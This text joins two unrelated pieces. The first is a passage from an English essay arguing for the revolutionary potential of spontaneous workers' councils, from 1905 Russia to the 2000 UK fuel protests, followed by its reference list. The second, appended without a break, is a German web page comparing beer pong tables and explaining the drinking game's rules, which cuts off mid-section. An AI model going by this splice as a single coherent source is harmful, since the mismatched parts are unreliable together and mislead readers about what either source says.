At all events , no party or organisation had proposed this form of struggle .
It was an entirely spontaneous movement ” ( p5 ) .
The workers ’ councils movement in Italy is traced back to ‘ spontaneous ’ workers ’ movements in the summer of 1917 , ‘ when ‘ the factories exploded into an anti-war demonstration ’ after mass street protests over the shortage of bread :
‘ The immediate uprising seems to have been entirely spontaneous ’ ( Williams 1975 , p63 ) .
In numerous other struggles which have thrown up workers ’ council formations in the 20th and even 21st centuries , the element of spontaneity is continually present , showing that workers repeatedly learn , in practice , the same class - based lessons .
In his history of the May 1968 events in France , Singer ( 2002 ) writes : ‘ Spontaneous is the recurring adjective in all the descriptions of the movement …
The May Movement was visibly spontaneous in the sense that the official parties and unions never took the initiative … ‘
In the same passage , Singer emphasises the crucial ( and hope - inducing ) characteristic of resurgence : ‘ After years of talk about the backwardness and apathy of the masses , the French crisis … was a natural vindication of spontaneity ’ in the sense of ‘ lay[ing ] bare the apathy and backwardness of bureaucratic leaderships ’ ( p315 ) .
The political crisis in Chile in the early ’ 70s saw ‘ spontanous and unorganised acts of resistance by the working class ’ ( Gonzalez 1987 , p64 ) , while in turn - of - the - millenium Argentina ‘ the rising was spontaneous .
It would be absurd to claim otherwise ’ ( Harman 2002 , p30 ) .
In a sense this dynamic of spontaneity stands as a necessary condition for the political potential of such working - class uprisings and formations .
‘ Artificial ’ attempts to set up workers ’ council formations or soviets , as in the Leeds conference of June 1917 , are seen to fail palpably ; as Lloyd George commented with his usual perspicacity , those who partook in the largely rhetorical decision to set up Workers ’ and Soldiers ’
Councils across Britain ‘ were mostly men of the type which think something is actually done when you assert vociferously that it must be done ’ ( quoted in Hinton 1972 , p239 ) .
In fact the Soviets which these delegates sought to emulate had , during the period between the February and October revolutions , by now themselves become largely institutionalised , as shown below .
‘ Fused by their common adversity ’ : Class unity in the Workers ’ Council Formation
The key characteristics of the workers ’ council formation so far defined – its delegate - based strucures of direct democracy , its self - activity , class independence and spontaneity – do not ( as suggested above ) arise out of ‘ thin air ’ .
Workers ’ constant reiteration of the specific workers ’ council formation reflects forms of shared experience rooted in the very nature of the capitalist labour process which , even during passive periods , generates a unity of response based in the intrinsically collective character of proletarian labour under capitalism .
As Williams puts it in his account of the Italian factory councils movement , by contrast with the ‘ sketchy unity ’ attained in organisations like trade unions and the camarere ( a form of labour exchange ) , within the workplace ‘ unity is inherent in the very process of production , the creative activity which creates a common and fraternal will ’ ( p115 ) .
Similarly , Hinton ’s analysis of independent rank and file organisation refers to ‘ the spontaneous unity of the workers in modern socially organised production ’ ( Hinton 1972 , p290 ) .
The same point is echoed in Gluckstein ’s characterisation of the Berlin workers ’ council of November 1918 : ‘ The central workers ’ and soldiers ’ council was not seen as an institution high above the masses , but simply the summit of a pyramid whose base was found in the combined strength of workers in production .
Whether in the factory , community or city , the different types of council were called “ Arbeiterrate ” ‘ ( p124 ) .
Such production - based class unity marks the collective and ‘ interchangeable ’ nature of workers ’ participation in workers ’ council actvity .
At strike committee meetings during the Great Upheaval , different workers ‘ assumed the lead briefly at one point or another , but only because they happened to be foremost in nerve or vehemence ’ ; a local Ohio newspaper reported that at strike committee meetings , workers ‘ proceeded with notable coherence , as though fused by their common adversity ’ ( Brecher 1997 p33 ) .
Along the same lines , Hungarian workers ’ council delegate Ferenc
Toke noted how during the key central meeting of the councils on November 14th 1956 , ‘ everybody , although they came from different factories , wanted exactly the same thing , just as if they had agreed their views in advance . ’
Nagy comments that ‘ in this way the councils really put the unity of the working class into practice ’ ( p31 ) .
Such class - based solidarity is not confined to the more dramatic episodes of working - class history .
Commenting on the bourgeoning workgroup organisation of the post - WW2 period , Brecher notes that ‘ it is largely in these groups that the invisible , underlying process of the mass strike develops .
They are communities within which workers come into opposition to the boss…and discover the collective power they develop in doing so …’ ( p277 ) .
For Brecher , this process highlights ‘ the two elements of labor struggles that carry the seeds of social transformation : self - directed action and solidarity ’ ( p298 ) .
The Issue is Not the Issue …
It is evident from these examples that the seeds and elemental structures of more potentially revolutionary moments are inherent in much lower and more ‘ everyday ’ levels of rank - and - file worker response and resistance .
These parallels indicate that the type of consciousness evident in episodes of workers ’ council formation is inherently tied , even at insurrectionary levels , to workers ’ previous experience of and response to the ‘ ordinary ’ experience of the labour process within capitalist relations of production , with all its daily vicissitudes .
As Brecher again points out , disputes spurred by specific material issues and demands in ‘ normal times ’ represent the tip of an ‘ iceberg ’ of underlying class conflict which emerges as generalised class struggle gains momentum ; in such circumstances , it can be said that often ‘ the issue is not the issue ’ ( pp 278 , 282 ) .
In other words , workers ’ underlying experience of exploitation and oppression engenders an ongoing resentment and class anger which rises to the surface and becomes generalised in situations of overt conflict .
This ‘ dual ’ or hidden consciousness is evoked by Gramsci when he argues that worker resistance ‘ signifies that the social group in question may indeed have its own conception of the world , even if only embryonic ; a conception which manifests itself in action , but occasionally and in flashes – when , that is , the group is acting as an organic totality ’ ( Gramsci p327 ) .
Dangerfield ’s nuanced account of the 1910 - 14 Great Unrest echoes this point ; writing of the dockers ’ struggle , he notes ‘… it would be very difficult to state exactly what they wanted …
But at the very heart of their grievances there stirred a rising anger at being indifferently paid …
A strike about money is not at all the same as a strike about wages ; [ it ] comes from a sense of injustice …
It is a voice in the wilderness , crying for recognition , for solidarity , for power ’ ( Dangerfield 1961 , p249 ) .
This , in turn , can lead to a situation in which such demands become transitional : ‘ In periods of mass strike , workers think , speak , and act …as oppressed and exploited human beings in revolt .
Their agenda is based on what they need , not on “ what the market will bear ” …’ ( Brecher p286 ) .
The history of workers ’ council formation reveals that , perhaps by contrast to socialist orthodoxy , such transformation of consciousness is almost universally rooted in material issues which tend to spark often insurrectionary levels of revolt from an apparently trivial or ‘ economistic ’ base .
Perhaps the most historic example of this is the Petrograd typographers ’ strike in 1905 which , in Trotsky ’s words , ‘ started over punctuation marks and ended by felling absolutism ’ – as well as , of course , generating the first Petrograd Soviet ( Trotsky 1971 p85 ) .
The resurgence of soviet power in the February 1917 revolution was in its turn sparked by women textile workers ’ strikes and protests over bread shortages ( Trotsky 1967 p110 ) as well as a strike against victimisation at the giant Putilov engineering works .
In Italy , working - class women forced to queue for hours for meagre rations as well as working up to 12 hours a day in the factories launched a hunger riot which ‘ soon reached insurrectionary proportions when the women made [ a ] crucial link with workers ’ industrial power …’ ( Gluckstein pp169-70 ) .
History provides many other examples of movements which , while ultimately challenging the system , are rooted in relatively mundane grievances .
In the Chilean , Portuguese and Iranian upsurges of the mid to late 1970s emphasis was placed by workers , as always , on basic material needs ; as one Chilean agricultural worker put it , ‘ We ’ve people to feed and families to keep .
And we ’ve had it up to here ’ ( Gonzalez 1987 , p51 ) .
Yet out of these materially - based struggles ‘ there emerged a new form of organisation … calling itself the ‘ industrial belt ’ – the cordon ’ ( p51 , emphasis in original ) .
In Portugal , even after quasi - revolutionary committees , CRTSMs , were established in the factories , ‘ Those who set [ them ] up saw the workers ’ commissions as being merely economic ’ .
In Iran , the movement which led up to the 1979 ‘ revolution ’ was preceded by ‘… strikes , sit-ins and other industrial protests [ most of which ] were confined to economic demands ’ ( Poya 1987 ) .
Such ‘ economistic ’ considerations , often dismissed by the intellectual left , are shown over and over not to preclude an explosion of consciousness which rapidly races towards overarching class and political considerations in a dynamic which , crucially , is not dependent in pre-existing ‘ socialist ’ awareness .
As one organizer In 1930s America noted , ‘ the so much bewailed absence of a socialist ideology on the part of the workers , really does not prevent [ them ] from acting quite anti-capitalistically ’ ( Brecher p165 ) .
Draper ( 1978 ) succinctly sums up this point :
‘ To engage in class struggle it is not necessary to “ believe in ” class struggle any more than it is necessary to believe in Newton in order to fall from an airplane ’ ( p42 ) .
Yet the ‘ leap ’ to class independence and consciousness is often experienced as transformational ; participants in the 21st century uprising in Argentina claimed , ‘ We have done things which we never even thought of and we still do n’t know what else we ’ll have to do ’ ( Harman 2002 , p23 ) .
During the same period as the ‘ economistic ’ workers ’ councils were developing in Portugal , ‘ Workers and soldiers were hungry for ideas … Lenin ’s State and Revolution was a best - seller in the shops ’ ( Robinson 1987 , p97 ) .
Repeating this theme of an awakening to ideas not previously considered by apparently ‘ apathetic ’ workers , Singer ( 2002 ) notes how during mass waves of strikes and occupations , ‘ [ w ] ith the dominant ideology shaken … the workers gathered in their strangely idle factories can learn in weeks more than they had grasped in years gone by .
The general strike can be a school of class consciousness … attended by eager millions who in normal times are not within reach … ( pp161 -2 ) .
‘ The stilled soul of a whole industry … ’
Simultaneously with the explosion of political consciousness which chacterises such dynamics , the issue of class power is irresistably posed whatever the consciousness of the participants .
Appel ’s analysis of the revolutionary movement in Germany remarks that the workers ’ councils formation ‘ showed itself to be the only form of organisation that allowed the outline of workers ’ power , and therefore … it alarmed the bourgeoisie and the Social Democrats ’ ( p5 ) .
While the key issues of the ‘ dual power ’ and indeed state power posed by the workers ’ council formation are discussed further below , the above examples identicate the enormous economic power signified by the withdrawal of labour .
As Dangerfield puts it with his usual felicity : ‘… a spontaneous and impulsive strike , begun by a handful of Welshmen against the advice of leaders … ultimately sounded its alarm in the stilled soul of a whole industry ’ ( p247 ) .
During the Hungarian revolution , ‘ Intellectuals , peasants and other non-industrial workers who had not hitherto fully appreciated [ the workers ’ councils ’ importance … recognised that here was the heart of real power in the country .
Kadar knew it too …’ ( Anderson 1964 , p87 ) .
Singer ( 1982 ) sums up the point in his account of the founding of Solidarnosc : ‘ Whatever some experts might have thought or hoped , the power of Solidarity ultimately rested on …the capacity of the working class to bring industry to a standstill and to paralyze the country ’ ( p255 ) .
Even in today ’s relatively modest worker mobilisations , the forces of the state and indeed official trade unionism are promptly organised in determined opposition to any potential stranglehold on ownership and profitability ; recent stymied worker occupations at Vestas and Visteon in Britain provide poignant evidence of this ( Smith 2009 , Wilson 2009 ) .
‘ Are you ready ? ’ Dual Power and the Soviet
However , it is in the historic occasions in which workers ’ councils emerged in their full revolutionary or quasi- revolutionary form that the nature and meaning of dual power and the fully - fledged soviet form are most clear .
What is meant by dual power ?
The above section has attempted to place the nature and importance of workers ’ power , potential or actual , firmly at the centre of the argument .
As suggested , this power is intrinsically tied up with the role of workers in production and the impact , always threatening to capital , of the withdrawal of labour .
While linked to this central production - related dynamic , the concept of dual power indicates a further and distinct dimension ; the association of withdrawal of labour with forms of worker - led domination over the organisation of capital and the economic system .
The workers ’ council , general strike committee , etc , in a sense shares power with a reluctant and alarmed bourgois state .
The ‘ balance of power ’ is fundamentally contested , with associated political and often revolutionary implications .
History provides numerous examples of dual power situations with an unquestionably revolutionary trajectory , if not always result .
During strikes which raged across Liverpool in the Great Unrest , a transport permit system run by the cross-city strike committee ‘ clearly challenged , and was perceived to challenge , the legitimacy of civil power …’ ( Holton 1976 , p102 ) .
In a more classically revolutionary trajectory , the workers ’ council movement in 1918 Germany briefly saw a direct clash of potential power between the ‘ masses of armed workers and soldiers ’ and Social Democratic politicians like the teacherous Ebert : ‘ Bourgeois republic or proletarian socialist state – these were the choices of a classic dual power situation ’ ( Gluckstein 1985 , p115 ) .
In the revolutionary year of 1919 , a mass strike in the US , centred in Seattle , based its organisation in a General Strike Committee which ‘ form[ed ] virtually a counter - government for the city ’ ( Brecher ) .
In the same year , the ever - devious Lloyd George challenged British trade union leaders with the political implications of threatened cross-union action : ‘ The strike …will precipitate a constitutional crisis of the first importance .
For , if a force arises in the State which is stronger than the State itself , then it must be ready to take on the functions of the State … Gentlemen , have you considered , and …are you ready ? ’
Needless to say , union leaders jibbed at the challenge ( Rosenberg 1987 , p74 ) .
The last major British upsurge of the period , the 1926 General Strike , saw both ‘ Councils of Action ’ and some experience of dual power for the strikers ; as one put it , ‘ Employers of labour were coming , cap in hand , begging for permission … to allow their workers to perform certain operations ’ ( Postgate et al , p35 ) .
However , by that time the revolutionary wave had crested .
Mass confrontations with capital were not seen again until the 1930s , but the balancing - act with the capitalist state signalled by the concept of ‘ dual power ’ had not disappeared .
In the post - war turmoil of 1945 , when ‘ all that really stood between the French workers and effective power were a few shaky bayonets ’ , French Communist Party leader Thorez declared , with predictable results , that ‘ Local Committees of Liberation should not substitute themselves for the local governments ’ ( Anderson 1964 , p9 ) .
Indeed , the CP - backed soviet state was also to be challenged in the wave of worker protests in eastern Europe .
In Hungary , the workers ’ council of Miskolc had ‘ formed workers ’ militias …and organised itself as a local government independent of the central power …
It was only ready to support Nagy if he applied a revolutionary programme ’ .
By November , almost all radio stations were controlled by the Revolutionary Councils ; ‘ workers … remained armed and solidly behind their own organisations .
A classical situation of “ dual power ” existed ’ ( Anderson 1964 pp69 , 78 - 9 ) .
In the insurgent Poland of the early 1970s , as a general strike spread out from the shipyards , ‘ striking bakers or printers … work[ed ] only with the strike committee ’s permission ’ ; the rulers of Warsaw ‘ began to perceive the nightmarish vision of Lenin ’s “ dual power ” . ’
When workers ’ council - based struggles once again erupted in 1980 , ‘ The interfactory committees acted and appeared as an organ of parallel power … Calm , confident , determined , the workers stayed in their plants as if these were impregnable fortresses ’ ( Singer 2002 , p221 ) .
As noted more than once , such quasi - revolutionary patterns of struggle often surface in less than revolutionary situations .
During the much - maligned ‘ Winter of Discontent ’ in Britain , often described as irretrievably ‘ economist ’ and ‘ sectional ’ ( Kelly 1988 ) , ‘elements of dual power began to characterise the dispute : ‘ Within a short time strike committees were deciding what moved in and out of many of the ports and factories .
Passes were issued for essential materials …
In some cases strike committees controlled the public services of whole cities . ’
One minister referred to the local strike committees of lorry drivers , train drivers and other groups organising the trasnport of essential supplies as ‘ little Soviets ’ , while , echoing the ‘ dual power ’ theme , Thatcher recorded in her memoirs that ‘ the Labour government had handed over the running of the country to local committees of trade unionists ’ ( Cohen 2006 , p50 ) .
Again in Britain , a 21st - century episode of conflict took place which earned the unexpected soubriquet ‘ Seven Days That Shook New Labour ’ from the press .
During one surreal week in September 2000 , a ‘ leaderless revolt ’ against exorbitant fuel taxes catapulted road haulage workers into the headlines when they blockaded oil depots and refineries in a desperate protest against rising fuel taxes .
Within a few days supermarkets were running out of food , ambulance services had imposed speed limits , and funeral directors were reporting that they had enough petrol to pick up bodies , but not to bury them .
Whatever the consciousness of its participants , the dispute had a clear ‘ dual power ’ character ; ‘ pickets are voting on a case - by - case basis whether to let the tankers out of the refinery … the driver presents his case to the picket - line and awaits their decision ’ .
The parallels with the ‘ Winter of Discontent ’ were clear , and were duly made by Labour politicians with ‘ deep fears … about the political implications of this crisis ’ ( Cohen 2006 pp133 -4 ) .
As a number of writers note , during periods and incidents featuring forms of dual power , workers ’ councils generated out of mass strikes , occupations and similar waves of struggle display an identical structure and trajectory to those archetypal organisations of revolutionary power , the Russian soviets .
As shown above , ‘ dual power situations ’ have occurred in many less than revolutionary situations , as invoked in the politician ’s ironic reference to ‘ little Soviets ’ during the British Winter of Discontent .
In fact ‘ the soviet can arise only during a situation of dual power ’ , according to Gluckstein ( 1985 , p218 ) .
As history shows , many such situations and formations can evoke the soviet form even without , ultimately , a revolutionary outcome .
Nevertheless , historically the soviet form invokes more than any other the trajectory of a fundamental challenge to capitalist economic and political order , a point more fully explored in our penultimate section .
‘ A Peculiar Sort of State … ’
What were the soviets ?
Trotsky ’s description of the 1905 revolution , in which soviets played an initiating and pivotal role , makes it overwhelmingly clear that these were ‘ workers ’ organisations , rather than the creation of the ‘ social - democratic organisation ’ ( revolutionary party ) .
As he wrote of the Petersburg Soviet : ‘ This purely class - founded , proletarian organization was the organization of the revolution as such … ’
Describing its structure , Trotsky evokes the production - based logic of the workers ’ council formation : ‘ Since the production process was the sole link between the proletarian masses … representation had to be adapted to the factories and plants …
One delegate was elected for every 500 workers … [ although ] in some cases delegates represented only a hundred … workers , or even fewer ’
( Trotsky 1971 , p 104 )
In other words , a classic workers ’ council .
It was not , then , the organisational form of the soviet which marked it out from its historical predecessors – quite the reverse ; not was its nature as a distinctively proletarian organization ( Trotsky op cit ) .
What is distinctive about the Russian soviets is their role – however brief – as organisations of actual , rather than potential , working - class power .
It is in this sense that the Soviets , in their revolutionary moment , express the unity signalled by both Marx and Lenin between this form of organisation and the form of what is , potentially , both workers ’ government and workers ’ state .
It was the crucial connection between the soviet form and and the structures of a workers ’ state in which all top - down institutions would necessarily ‘ wither away ’ which so excited Lenin when making connections with Marx ’s analysis of the Paris Commune .
As he wrote in The State and Revolution , ‘… the Commune would appear to have replaced the shattered state machinery “ only ” by fuller democracy : [ for example ] all officials to be fully elective and subject to recall .
But …the “ only ” signifies a gigantic replacement of one type of institution by others of a fundamentally different order .
Here we observe a case of “ transformation of quantity into quality ” : democracy …is transformed from capitalist democracy into proletarian democracy : from the state ( i.e. , a special force for the oppression of a particular class ) into something which is no longer really the state in the accepted form of the word ’ ( Marx and Lenin , pp110 - 11 ) .
In the same way , the Soviets endorsed by Lenin served as a transitional form both embodying features of a potential workers ’ state and leading to the conquest of power towards that form of state – or rather , its ‘ withering away ’ .
Hammering home the point , Lenin lamented in his April Theses , written in 1917 , that the Soviets were ‘ not understood … in the sense that they constitute a new form or , rather , a new type of state ’ .
This was the type of state which the Russian revolution began to create in 1905 and 1917 .
In this sense the ‘ withering away of the state ’ under socialism and communism along with workers ’ production - based forms of self - management , are fused in the form – the soviet – which workers spontaneously adopt as vehicle to fight for their own class demands .
That this is a fundamentally contested process is made evident in John Reed ’s historic Ten Days… , which vividly portrays the fanatical resistance of the ruling class and indeed ‘ soft left ’ to any real rather than symbolic seizure of power by those ‘ shabby soldiers [ and ] grimy workmen … poor men , bent and scarred in the brute struggle for existence ’ who had seized and made their own the now - institutionalised Soviets ( Reed 1977 , p123 ) .
It was the unceasing endorsement of the Soviet form of organisation and potentially revolutionary power which the Bolsheviks , alone amongst the socialist groups of the period , consistently adopted which gained them , at least for this brief and magical period , the passionate loyalty of the Russian working class .
It was not , of course to last ; as suggested above , there is nothing sustainable about the soviet form per se outside the context , as yet unattained , of international working - class rule and thus state dissolution .
The etymology and history of the word ‘ soviet ’ illustrates this point ; its literal meaning is ‘ council ’ .
As Reed ( 1997 ) notes , ‘ Under the Tsar the Imperial Council of State was called Gosudarstvenniyi Soviet ’ ( p23 ) .
A term which for a brief time signified revolutionary glory was thus , before 1905 , used in the mundane sense of ‘ town council ’ , while under Stalinism ‘ Soviet rule ’ became merely a term for iron - clad repression .
Even the soviets of 1905 , revived and re-established in the run-up to the February 1917 revolution , were not beyond corruption .
As Lenin noted bitterly in The State and Revolution , ‘ Such heroes of rotten philistinism as the Skobelovs and the Tseretelis …have managed to pollute even the Soviets , after the model of the most despicable petty - bourgeois parliamentarianism , by turning them into hollow talking shops ’ ( Marx and Lenin 1967 , pp114 - 5 ) .
Singer drives the point home : ‘ It was …difficult to conceive that in [ the ] distant future the soviets would be a fiction , the …dictatorship a parody of socialist democracy , and the so - called workers ’ state a mighty organ of coercion ’ ( Singer 2002 , p339 ) .
It is perhaps logical that , during the Solidarnosc uprising , leading CP bureaucrat Ruwelski ‘ vituperated against the workers ’ councils , the soviets – a diabolical invention of the Bolsheviks ’ ( Singer 1982 p270 ) .
This potential bureaucratisation of once dynamically revolutionary workers ’ organisations points to an essential lesson to be learnt from studying the workers ’ council formation .
The inherent characteristics of direct democracy , independence from officialdom , spontaneity and self - activity listed above are in fact essential to this formation ’s potential success in achieving and sustaining social transformation .
Rather than ‘ anarchistic ’ , as the suspicious Communist and Socialist parties of Italy labelled the factory councils , their characteristics of sponteneity , self - activity and class antagonism were what could , with different political leadership , have carried them to the political barricades and thus to the aid of the increasingly fragile soviet regime in Russia .
I was , I am , I will always be …’
The above analysis has not sought to address the question of the historic failure of the workers ’ council formation to achieve a lasting regime of workers ’ power and ownership , participative democracy and freedom from the oppressions under which the world currently labours .
While this question is clearly crucial , the argument here has sought to emphasise the always renewed and extradordinary potential of these ( to paraphrase Luxemburg ) ‘ fresh , young , powerful , buoyant ’ organisations .
As suggested throughout , the same workplace - based , directly democratic , ‘ spontaneous ’ formations constantly surface and resurface in often entirely unpredictable surges of working - class struggle .
It is this that provides us with the only hope available in a ‘ new world order ’ dominated by the greed , immorality and violence of neo-liberalism .
Much current ( and indeed past ) socialist analysis would question whether working - class activity is the ‘ only hope available ’ .
Many left perspectives place considerable weight on ‘ new social movements ’ involving youth , radicalised women , oppressed ethnic minorities and other identity - based groups for reviving an ‘ anti- capitalist movement ’ .
Again , movements rooted in causes some way from the point of production , most notably the environmental crisis , gain considerable credence for a left urgently seeking panaceas which appear in some way to accord with 21st - century culture and mores .
The current argument in no way denies these urgent priorities .
What is attempted here is a reassertion of the historic , if often discounted , role of working class struggle , in all its diverse 21st - century manifestations .
As impled , this is not a fashionable or popular perspective .
However , the history summarised above demonstrates beyond doubt the insurrectionary potential of grass - roots workplace - based resistance which , in instances from the earliest stages of industrial organisation to today ’s globalised waves of unionisation and strike action ( Moody 1997 , Mason 2007 ) , has ‘ stormed heaven ’ to challenge the existing order in ways which its rulers , at least , take with the utmost seriousness .
This contribution is a plea to today ’s left to note the transformational potential of the grass - roots , directly democratic , resurgent organisational formations chronicled above , and to take equally seriously that continuing potential .
It seems appropriate to conclude , then , on the note of revolutionary optimism sounded by Rosa Luxemberg in her last defiant shout to the bourgeoisie : ‘ Your order is built on sand .
Tomorrow the revolution will raise its head again and proclaim to your horror , amid a brass of trumpets : I was , I am , I will always be . ’
References
Anderson , Andy 1964 , Hungary ’ 56 , London : Phoenix Press
Appel , Jan 2008 , ‘ Origins of the movement for workers ’ councils in Germany ’ , London : The Commune Pamphlet no .
5 ,
Barker , Chris ( ed ) 1987 , Revolutionary Rehearsals , London : Bookmarks
Birchall , Ian 1974 , Workers Against The Monolith : The Communist Parties Since 1943 , London : Pluto Press .
Brecher , Jeremy 1997 , Strike ! , Boston : South End Press
Charlton , John 1997 , The Chartists : The First National Workers ’ Movement , London : Pluto Press
Cohen , Sheila 2006 , Ramparts of Resistance : Why Workers Lost Their Power , and How to Get It Back , London : Pluto Press
Dangerfield , George 1961 , The Strange Death of Liberal England , New York : Capricorn
Darlington , Ralph 2009 , ‘ Organising , Militancy and Revitalisation : The Case of the RMT Union ’ in Gall ( ed ) 2009
Draper , Hal 1978 , Karl Marx ’s Theory of Revolution : The Politics of Social Classes , New York : Monthly Review Press
Fosh , Patricia and Cohen , Sheila 1990 , ‘ Local Trade Unionists in Action : Patterns of Union Democracy ’ in Fosh and Heery ( eds ) Trade Unions and their Members , Macmillan
Gall , Gregor ( ed ) 2009a , Union Revitalisation in Adavanced Economies : Assessing the Contribution of Union organising , Palgrave Macmillan
Gall , Gregor ( ed ) 2009 b , The Future of Union
Organising : Building for Tomorrow , Palgarve Macmillan
Gluckstein , Donny 1985 , The Western Soviets : Workers ’ Councils versus Parliament 1915 - 20 , London : Bookmarks
Gonzalez , Mike 1987 , Chile 1972 - 3 : The workers united ’ , in Barker ( ed ) .
Gramsci , Antonio 1971 , Prison Notebooks , London : Lawrence and Wishart
Harman .
Chris 1974 , Bureaucracy and Revolution in Eastern Europe , London : Pluto Press
Harman , Chris 2002 , ‘ Argentina : Rebellion at the Sharp End of the World Crisis ’ International Socialism 94
Hinton , James 1972 , The First Shop Stewards ’ Movement , London : George Allen and Unwin
Holton , Bob 1976 , British Syndicalism 100- 1914 , London : Pluto Press
Kelly , John 1988 , Trade Unions and Socialist Politics , London : Verso
Kelly , John ( 1998 ) , Rethinking Industrial Relations : Mobilisation , Collectivism and Long Waves , London : Routledge
Koenker , Diane 1981 , Moscow Workers and the 1917 Revolution , Princeton University Press
Leopold , Les 2007 The Man Who Hated Work and Loved Labor Chelsea Green : Vermont
Lynd , Staughton 2003 , ‘ Students and Workers in the Transition to Socialism : The Singer Model ’ Monthly Review Vol. 54 , No 10
Marx , Karl and Lenin , V.I. 1968 , Civil War in France : The Paris Commune New York : International Publishers
Mason , Paul 2007 , Live Working or Die Fighting : How the Working Class Went Global , London : Harvill Secker
Moody , Kim 1997 , Workers in a Lean World : Unions in the International Economy , New York : Verso
Nagy , Balazs 2006 , How the Budapest Central Workers ’ Council was Set Up , Liverpool : Living History Library
Postgate , R.W. , Ellen Wilkinson and J.F. Horrabin 1927 , A Workers ’ History of the Great Strike , London : The Plebs League
Poya , Maryam 1987 , ‘ Iran 1979 : Long live Revolution !
… Long live Islam ? ’ in Barker ( ed )
Reed , John 1977 , Ten Days That Shook the World , London : Penguin Books
Robinson , Peter 1987 , ‘ Portugal , 1974 - 5 : Popular power ’ in Barker ( ed )
Rosenberg , Cheni 1987 , 1919 : Britain on the Brink of Revolution London : Bookmarks
Singer , Daniel 1982 , The Road to Gdansk : Poland and the USSR , New York : Monthly Review Press
Singer , Daniel 2002 , Prelude to Revolution : France in May 1968 , Cambridge : South End Press
Smith , Mark 2009 , ‘ Vestas Occupation ’ , Solidarity , 25 .
Trotsky , Leon 1967 , The History of the Russian Revolution , London : Sphere Books
Trotsky , Leon 1971 , 1905 , New York : Vintage Books
Weir , Stan 1967 , ‘ U.S.A. – The Labor Revolt ’ , Boston : New England Free press
Williams , Gwyn A. 1975 , Proletarian Order : Antonio Gramsci , Factory Councils and the Origins of Communism in Italy 1911 - 1921 , London : Pluto Press
Wilson , Phil 2009 , We Knew We Had Nothing to Lose , Solidarity , 25
Wright , Steve 2002 , Storming Heaven : Class Composition and Struggle in the Italian Autonomi , London : Pluto Press
Die nächste Houseparty steht an und ihr wollt euren Gästen neben Bier und guter Musik ein Highlight bieten ?!
Dann ist genau das Trinkspiel schlichtweg euer Stimmungsmacher .
Bier Pong heisst es. Den Ursprung hat Bier Pong in den USA .
Die Grundidee liegt bei Tischtennis .
Bier Pong ist aus einem Zufall entstanden , denn als Gäste bei einem anderen Trinkspiel ihre Becher zufällig auf der Tischtennistischplatte abstellten währenddessen das Trinkspiel lief , landeten die Tischtennisbälle zufällig in den Bechern der Gäste .
So wurde dann Bier Pong geboren .
Mit der Zeit wurde Bier Pong verbessert und bürgerte sich immer mehr in der Partywelt junger Leute ein .
Man hat zu dem das Trinken von alkoholischen Getränken in Verbindung mit Spielen zu einem Unterhaltungsfaktor gemacht .
Bier Pong hat sich im Laufe der Jahre an die Spitze der Trinksportarten gearbeitet .
Neben den klassischen Trinkspielen wie das Werfen von Pfeilen auf Dartscheiben , Flunkyball , Doppelkopf oder Looping Louie , ist Bier Pong auf dem Thron der Trinkspiele gelandet .
Auf dieser Seite könnt Ihr unsere sehr guten Erfahrungen mit dem Bier Pong Tisch lesen .
Bier Pong Tisch Vegleich – Die TOP 5
Es gibt viele Bier Pong Tische im Internet .
Wir haben euch die 5 besten und hochwertigsten Bier Pong Tische hier im Vergleich aufgeführt .
Wie Ihr sehen könnt , gibt es sehr viele Bier Pong Tische .
Im Endeffekt sind alle gleich und unterscheiden sich eigentlich nur im Design und im Preis .
Welcher Bier Pong
Tisch euch zusagt , ist eurem Geschmack überlassen .
Euch muss der Bier Pong Tisch gefallen .
Wie wird Bier Pong gespielt ?
Zusammenfassung
Was wird benötigt ?
Spieler 2 oder 4 Spieler Aufbauzeit 3 Minuten Spielzeit 10 – 20 Minuten Getränke Bier , Spirituosen Ausrüstung Bier Pong Tisch , Becher , Tischtennisbälle Benötigte Fähigkeiten Zielgenauigkeit , Nerven , Augen - Hand - Koordination , Konzentration
Ein allgemeines Regelwerk hat Bier Pong nicht .
Allerding gibt es wichtige Regeln :
Alle Spieler eines Bier Pong Teams werfen einen Ball
Ist ein Ball in einem Becher gelandet , so ist dieser auszutrinken
Werden von einem Team zwei Becher getroffen , so muss das gegenerische Team beide Becher leeren
Trifft ein Team mit beiden Bällen in einen Becher , sind 3 Becher zu leeren
wird daneben geworfen , so darf der Gegner werden
Bier Pong kann man in 4 Phasen unterteilen .
Phase 1 : Spielaufbau
Im Idealfall verfügt Ihr als Gastgeber über einen Bier Pong Tisch .
Dies erleichert den Aufbau des Spiels und verringert die Aufbauzeit um ein vielfaches .
Denn dort sind die Abständer und Bechermakierungen bereits angegeben .
Somit heisst es nur noch Becher aufstellen .
Wie in der Abbildung sollten die 10 Becher jedes Teams aufgestellt sein .
Die pyramidische Aufstellung erleichtert hinzu noch das Befüllen der Becher .
Die Becher an den Seiten sind Waschbecher zum Waschen der Bälle .
Es wäre aus hygienischen Gründen sehr ratsam nach jeder Runde die Bälle zu waschen .
Sobald alles auf dem Bier Pong Tisch aufgebaut ist und die Becher befüllt wurden , kann durch einen Münzwurf , wie beim Fussball auch , der Beginner ausgelost werden .
Alterntiv kann man auch eine Runde Schere - Stein - Papier wählen .
Aber das ist natürlich euch überlassen .
Phase 2 : Werfen
Jedes Team erhält in der leichten Variante einen Ball oder in der schwereren Variante zwei Bälle .
Das Spiel beginnt , ihr habt vor euch den Bier Pong Tisch und die Becher des Gegners .
Im Bestfall beginnt ihr mit eurem ersten Wurf .
Wie Ihr den Ball in den gegnerischen Becher werft ist natürlich euch überlassen .
Vor einem
Wurf sollte aber beachtet werden das der Elbogen eines jeden Werfers hinter der Kante des Bier Pong Tisch liegen muss , sonst zählt der Wurf als ungültig .
Zwei Wurfarten :
der direkte Wurf – Im Idealfall werft Ihr von oben herab den Ball in einem Bogen in den Becher .
Der Gegner darf den Ball nicht mit der Hand abwehren .
Wird der Becher getroffen so muss der Gegner diesen Becher exen .
– Im Idealfall werft Ihr von oben herab den Ball in einem Bogen in den Becher .
Der Gegner darf den Ball nicht mit der Hand abwehren .
Wird der Becher getroffen so muss der Gegner diesen Becher exen .
der Bounce Wurf – Bei einem Bounce , lasst Ihr den Ball auf der Spielfläche des Bier Pong Tisch aufkommen und trefft den Becher mit einem oder mehreren Bouncern auf der Spielfläche .
Aber Vorsicht , der Gegner darf den Ball abwehren .
Wehrt der Gegner diesen Ball ab , so muss ein Becher von euch getrunken werden .
Sollte der Gegner aber diesen Ball nicht abwehren können oder einen seiner Becher umstoßen kann man die Bestrafung nutzen .
Der Gegner muss somit ein oder zwei Becher trinken .
Die Strafe sollte aber vor Beginn des Spiel festgelegt werden .
Phase 3 : Treffer
